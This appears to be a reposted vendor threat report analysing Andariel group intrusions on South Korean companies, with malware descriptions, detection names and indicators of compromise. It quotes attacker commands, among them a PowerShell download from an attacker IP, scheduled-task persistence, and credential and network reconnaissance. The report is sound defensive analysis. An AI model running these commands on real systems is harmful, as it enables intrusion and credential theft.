Circumstances of an Attack Exploiting an Asset Management Program (Andariel Group)

by Prapattimynk, Tuesday, 21 November 2023 (3 months ago)
Circumstances of an Attack Exploiting an Asset Management Program (Andariel Group)


The ASEC analysis team identified the circumstances of the Andariel group distributing malware via an attack using a certain asset management program. The Andariel group is known to be in a cooperative relationship with or a subsidiary organization of the Lazarus group.

The Andariel group usually launches spear phishing, watering hole, or supply chain attacks for initial penetration. There is also a case where the group exploited a central management solution during the malware installation process. Recently, the Andariel group has been exploiting vulnerabilities in many programs such as Log4Shell and Innorix Agent to attack targets in various corporate sectors in South Korea. [1]

Another asset management program was used in the recently identified attack. Additionally, an attack targeting MS-SQL Server was also identified at the same time. Malware strains installed through these attacks include not only TigerRat, but also various other types such as NukeSped variants, Black RAT, and Lilith RAT, an open-source malware strain. The attack targets were found to be South Korean communications companies and semiconductor manufacturers, similar to those in previous cases of attacks.

1. Initial Penetration

AhnLab Smart Defense (ASD) recently detected logs of a certain South Korean asset management program having installed the Andariel group’s malware. But of course, it cannot be determined from these logs alone whether these signify an attack that takes advantage of a vulnerability or a simple exploit. The asset management program running in the target system ultimately used the following PowerShell command to download the malware.

Figure 1. Malware downloaded using an asset management program
  • PowerShell command: wget hxxp://109.248.150[.]147:8585/load.png -outfile C:Userspubliccredis.exe

Besides PowerShell, the Andariel group also used the mshta.exe process to download malware. The following is HTML malware uploaded to the C&C URL, and this malware is responsible for downloading other malware strains from the Andariel group such as TigerRat.

Figure 2. Downloader script

In previous attack cases, the Andariel group used Innorix Agent and spear phishing attacks together. A notable fact about the recent attacks is that there are cases where malware was installed using MS-SQL Server. It is presumed that the threat actor attacked poorly managed MS-SQL servers and installed NukeSped. The presumption is based on the fact that malware strains such as Remcos RAT and Mallox ransomware are also usually installed through attacks against MS-SQL servers which have account credentials that are vulnerable against brute force or dictionary attacks, and also on the fact that there are logs of other threat actors’ attempts to install such malware strains in the system in the past. Thus, it seems that the Andariel group has also been using poorly managed MS-SQL servers as attack vectors in recent days.

Figure 3. NukeSped being installed through MS-SQL Server

Similar to other attacks that target MS-SQL Server, PrintSpoofer was used for privilege escalation during the attack process.

Figure 4. PrintSpoofer privilege escalation malware also used in the attack against MS-SQL Server

2. Malware Used in Attacks

Backdoors installed through the attacks above include TigerRat, a major malware strain used by the Andariel group, as well as Black RAT and variants of NukeSped. These malware strains are almost identical to those of previous attacks, but open-source malware Lilith RAT was used in the recent attacks. Additionally, in line with the Andariel group’s recent tendency that uses malware developed in the Go language, a downloader malware developed in Go was also discovered.

2.1. TigerRat

The malware installed through the South Korean asset management program was TigerRat. The Andariel group has been using TigerRat in most attacks against South Korean targets; the attacks include watering hole, Log4Shell vulnerability, and more. [2] TigerRat is a backdoor that supports various features such as uploading and downloading files, executing commands, collecting basic information, keylogging, taking screenshots, and port forwarding.

A difference between this and other ordinary backdoors is that there is an authentication process during initial communications with the C&C server where a certain string must be sent and received. Like the types identified in 2023, random strings with sizes of 0x20 were used in the authentication for TigerRat in the recent attacks. These strings are deemed to be the MD5 hash for “fool”(dd7b696b96434d2bf07b34f9c125d51d) and “iwan”(01ccce480c60fcdb67b54f4509ffdb56).

Figure 5. Strings used in authentication with the C&C server
  • C&C request string: dd7b696b96434d2bf07b34f9c125d51d
  • C&C response string: 01ccce480c60fcdb67b54f4509ffdb56

2.2. Golang Downloader

The Andariel group has been creating and using various backdoors in the Go language since around 2023. Black RAT, Goat RAT, and DurianBeacon were used in previous cases, and a downloader developed in Go was used in the recent attacks. This malware has a simple structure that connects to the C&C server and installs an additional payload. A notable characteristic is that it uses Base64 encryption during communications with the C&C server.

Figure 6. The downloader malware’s Base64 decryption routine

Not only did the threat actor exploit the South Korean asset management program to install TigerRat directly, but they also employed the method of installing the Golang downloader which in turn installed an additional payload. Malware installed through the Golang downloader include TigerRat and variants of NukeSped.

2.3. NukeSped Variants

NukeSped is a backdoor that can receive commands from the C&C server and control the infected system. Among the NukeSped variants used in the attacks, Type 1 sends a packet using the POST method during initial communications with the C&C server and then sends the results of the executed commands transmitted from the C&C server through the GET method disguised as the behavior of visiting Google.

Figure 7. C&C communications packet

Another NukeSped variant was identified in the attack process. While it has a small size of 23 KB, the string used for auto-deletion is similar to that of the past NukeSped variants.

Figure 8. NukeSped’s string

2.4. Black RAT

Black RAT is a backdoor developed in the Go language and was first identified in an attack by the Andariel group in 2023. While no source code information is included in the Black RAT used in the recent attacks, it could be distinguished through the fact that the function names were almost identical to the Black RAT in the past.

Figure 9. List of Black RAT’s functions

2.5. Lilith RAT

Lilith RAT is an open-source RAT malware published on GitHub. It was developed in C++ and provides various features for controlling the infected system such as remote code execution, maintaining persistence, and auto-delete.

Figure 10. Lilith RAT’s GitHub page

Lilith RAT, used by the Andariel group for their attacks, has a significant portion of the strings in its binary encrypted. This is deemed to be for the purpose of evading file detection. However, not all strings are encrypted, and some strings are the same as those in Lilith RAT’s source code.

Figure 11. Strings in Lilith RAT

2.6. Adding User Account

Aside from controlling the infected system using backdoors, the threat actor also added a user account in the system and concealed it. This task was performed using a malware strain the threat actor developed. Because this malware runs properly only when a certain user account exists in the infected system, the addition of a user account signifies that the threat actor has already gained control over the system.

Figure 12. The routine that diverges depending on the existence of a certain user

Ordinarily, the reasons why the threat actor adds a user account even when they can control the infected system using a backdoor are to use Remote Desktop to control the target in a GUI environment and maintain persistence afterward. However, if an account is added without any other steps, a system user can recognize a newly created user account upon login.

For this reason, the malware goes through the following process to prevent the user from noticing. First, the account is created with the sign “$” added to the name. Then, a part of the SAM data of an existing user is copied and overwritten onto the created “black$” account. If the existing user is an admin account and permitted to use Remote Desktop, the “black$” account also obtains the same properties.

For reference, malware strains used by the Kimsuky group added the newly created user account to the admin group and also to SpecialAccounts, enabling the account in firewalls. [3] This process can easily be detected by security products, but the Andariel group characteristically used the aforementioned malware to add a concealed account without the additional step.

Figure 13. Kimsuky group’s malware that adds and conceals a user account

3. Post Infection

After installing the backdoor, the threat actor ran the following commands and registered them to the task scheduler to maintain persistence.

Figure 14. Commands executed by the threat actor
> schtasks /delete /tn “microsoft******” /f
> schtasks /create /tn “microsoft******” /tr “c:users%ASD%credis.exe” /sc onlogon /ru system
> schtasks /run /tn “microsoftwindowsmuiroute”

Afterward, the following commands were used to look up information on the infected system.

> cmd.exe /c “query user”
> cmd.exe /c “ipconfig”
> cmd.exe /c “whoami”
> cmd.exe /c “cmdkey /list”
> cmd.exe /c “netsat -nao | findstr 445”

Besides the commands above, there were other commands that removed the downloader malware or terminated other processes.

> cmd.exe /c “del /f c:users%ASD%perf.exe”
> taskkill /f /pid 15036

In addition to using the backdoor to collect information, the threat actor also downloaded and used hacking tools such as NirSoft’s CredentialsFileVIew and Network Password Recovery. These tools show account credentials saved in the infected system as well as account credentials on shared folders. These can be used in the future for lateral movement within the organization’s network that the affected system belongs to.

Figure 15. Netpass downloaded and executed after malware infection

4. 결론

The Andariel group is one of the threat groups that are highly active in South Korea, alongside the Kimsuky and Lazarus groups. The group initially launched attacks to acquire information related to national security, but now they are also attacking for financial gain. [4] They are known to use spear phishing or watering hole attacks, and they also exploit vulnerabilities in software during the initial penetration. There have also been circumstances of the Andariel group having exploited other vulnerabilities in the attack process to distribute malware.

In recently discovered attack cases, the group seems to be using various programs such as asset management software within companies for supply chain attacks in addition to launching attacks against vulnerable MY-SQL servers. Users must be particularly cautious against attachments in emails from unknown sources and executable files downloaded from web pages. Security administrators in companies must enhance monitoring of asset management programs and apply patches for any security vulnerabilities in the programs. The latest patch for OS and programs such as Internet browsers must be applied, and V3 must be updated to the latest version to prevent malware infection in advance.

AhnLab’s anti-malware product V3 detects and blocks malware using the detection names below. The IOC is as follows.

Figure 16. V3 detection result

File Detection
– Malware/Win.Generic.C5528992 (2023.10.25.00)
– Malware/Win.Generic.C5528516 (2023.10.26.00)
– Backdoor/Win.TigerRAT.C5517634 (2023.10.19.03)
– Backdoor/Win.Agent.C5518308 (2023.10.20.00)
– Downloader/HTML.Agent.SC193459 (2023.10.19.03)
– Downloader/HTML.Agent.SC193403 (2023.10.18.01)
– Backdoor/Win.TigerRAT.C5513095 (2023.10.17.03)
– Unwanted/Win.HackTool.C5175443 (2022.06.20.02)
– HackTool/Win.CredentialsFileView (2022.04.20.00)
– Backdoor/Win.Agent.R619279 (2023.11.01.01)
– Backdoor/Win.Agent.C5534745 (2023.11.01.01)
– Backdoor/Win.NukeSped.C5535346 (2023.11.01.03)
– Backdoor/Win.BlackRAT.C5535345 (2023.11.01.03)
– Exploit/Win.PrintSpoofer.C5535350 (2023.11.02.00)

Behavior Detection
– Malware/MDP.Download.M1197

IOC
MD5

– 13b4ce1fc26d400d34ede460a8530d93: TigerRat (credisvs.exe, credis.exe)
– 41895c5416fdc82f7e0babc6bb6c7216: TigerRat (credisvs.exe)
– c2f8c9bb7df688d0a7030a96314bb493: TigerRat (crec.exe, dbinfo.exe)
– 33a3da2de78418b89a603e28a1e8852c: TigerRat (mltest.exe)
– 4896da30a745079cd6265b6332886d45: Lilith RAT (svchost.exe, secure.exe, test.exe)
– 73eb2f4f101aab6158c615094f7a632a: NukeSped variant – Type 1 (system.exe, credisvc.exe)
– 7f33d2d2a2ce9c195202acb59de31eee: NukeSped variant – Type 1 (mshelp.exe)
– e1afd01400ef405e46091e8ef10c721c: NukeSped variant – Type 1 (msuser.exe)
– fe25c192875ec1914b8880ea3896cda2: NukeSped variant – Type 1 (credisvc.exe)
– 232586f8cfe82b80fd0dfa6ed8795c56: NukeSped variant – Type 2 (perf.exe)
– c1f266f7ec886278f030e7d7cd4e9131: Black RAT (winsta.exe)
– 49bb2ad67a8c5dfbfe8db2169e6fa46e: Golang downloader (perf.exe)
– beb199b15bd075996fa8d6a0ed554ca8: Golang downloader (credisvc.exe)
– 4053ca3e37ed1f8d37b29eed61c2e729: Malware for adding user account (test.exe)
– 3a0c8ae783116c1840740417c4fbe678: Malware for adding user account (test.exe)
– 0414a2ab718d44bf6f7103cff287b312: PrintSpoofer (print.exe)
– ca564428a29faf1a613f35d9fa36313f: Network Password Recovery – NirSoft (net.exe)
– ad6d4eb34d29e350f96dc8df6d8a092e: CredentialsFileView – NirSoft (credentialsfileview.exe)
– dc70dc9845aa747001ebf2a02467c203: Downloader script
– 3d2ec58f37c8176e0dbcc47ff93e5a76: Downloader script

C&C URLs
– 27.102.115[.]207:8088: Black RAT, NukeSped variant Type 2
– 27.102.118[.]204:8081: Golang downloader
– 84.38.132[.]67:8443: NukeSped variant Type 1, Lilith RAT
– 109.248.150[.]147:443 : TigerRat
– 109.248.150[.]147:8080 : TigerRat
– 109.248.150[.]147:8443 : TigerRat
– 185.29.8[.]108:443 : TigerRat
– 185.29.8[.]108:3443 : TigerRat
– 185.29.8[.]108:4443 : TigerRat
– 185.29.8[.]108:8080 : TigerRat
– 185.29.8[.]108:8081: Golang downloader
– 185.29.8[.]108:8443: TigerRat, NukeSped variant Type 1

Download URLs
– hxxp://27.102.128[.]152:8098/load.png: TigerRat
– hxxp://27.102.118[.]204:6099/fav.ico: Golang downloader
– hxxp://84.38.132[.]67:9479/fav.ico: User Adder, Lilith RAT
– hxxp://84.38.132[.]67:9479/netpass.png: Network Password Recovery – NirSoft
– hxxp://109.248.150[.]147:8585/load.png: TigerRat
– hxxp://109.248.150[.]147:8585/load.html: Downloader script
– hxxp://109.248.150[.]147:8585/view.php: TigerRat
– hxxp://185.29.8[.]108:8585/load.html: Downloader script
– hxxp://185.29.8[.]108:8585/view.php: TigerRat

Subscribe to AhnLab’s next-generation threat intelligence platform ‘AhnLab TIP’ to check related IOC and detailed analysis information.

Comments

Your email address will not be published. Required fields are marked *

Ads Blocker Image Powered by Code Help Pro

AdBlocker Detected!!!

We have detected that you are using extensions to block ads. Please support us by disabling these ads blocker.